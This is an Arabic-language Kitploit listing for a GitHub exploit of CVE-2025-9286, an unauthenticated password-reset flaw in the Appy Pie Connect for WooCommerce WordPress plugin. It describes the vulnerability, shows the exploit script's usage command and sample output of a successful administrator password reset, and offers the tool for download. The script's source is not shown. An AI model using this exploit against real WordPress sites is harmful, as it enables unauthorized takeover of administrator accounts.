Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-9286 — Appy Pie Connect لـ WooCommerce <= 1.1.2 - غياب التفويض يؤدي إلى تصعيد الامتيازات بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-9286
تصعيد الامتيازاتهجمات كلمات المرورالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect لـ WooCommerce <= 1.1.2 - غياب التفويض يؤدي إلى تصعيد الامتيازات بدون مصادقة

عرض المستودع
3منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - غياب التفويض يؤدي إلى تصعيد الامتيازات دون مصادقة

⚠️ Appy Pie Connect for WooCommerce <= 1.1.2 - غياب التفويض يؤدي إلى تصعيد الامتيازات دون مصادقة عبر reset_user_password

📝 الوصف

إن إضافة Appy Pie Connect for WooCommerce لمنصة WordPress عرضة لتصعيد الامتيازات (Privilege Escalation) بسبب غياب التفويض داخل معالج REST الخاص بـ reset_user_password() في جميع الإصدارات حتى 1.1.2 ضمنًا.
هذا يتيح للمهاجمين غير المصادقين إعادة تعيين كلمة مرور أي مستخدم، بما في ذلك المسؤولين، وبالتالي اكتساب وصول إداري.

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (حرجة)

💻 سكربت الاستغلال

يمكن استخدام السكربت التالي لاستغلال CVE-2025-9286 ضد مواقع WordPress التي تشغّل الإصدار المتأثر من الإضافة.

اسم السكربت: CVE-2025-9286.py

⚙️ طريقة الاستخدام

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 مثال على المخرجات (الاستغلال الناجح)

root@kitploit:~
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 التواصل والمجتمع

  • 📨 تيليغرام: @Kxploit
  • 📡 قناة تيليغرام: @KNxploited

⚠️ إخلاء مسؤولية

هذا الاستغلال لأغراض التعليم واختبار الاختراق المصرح به فقط.
الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


بقلم: Khaled Alenazi (Nxploited)

تنزيل الأداة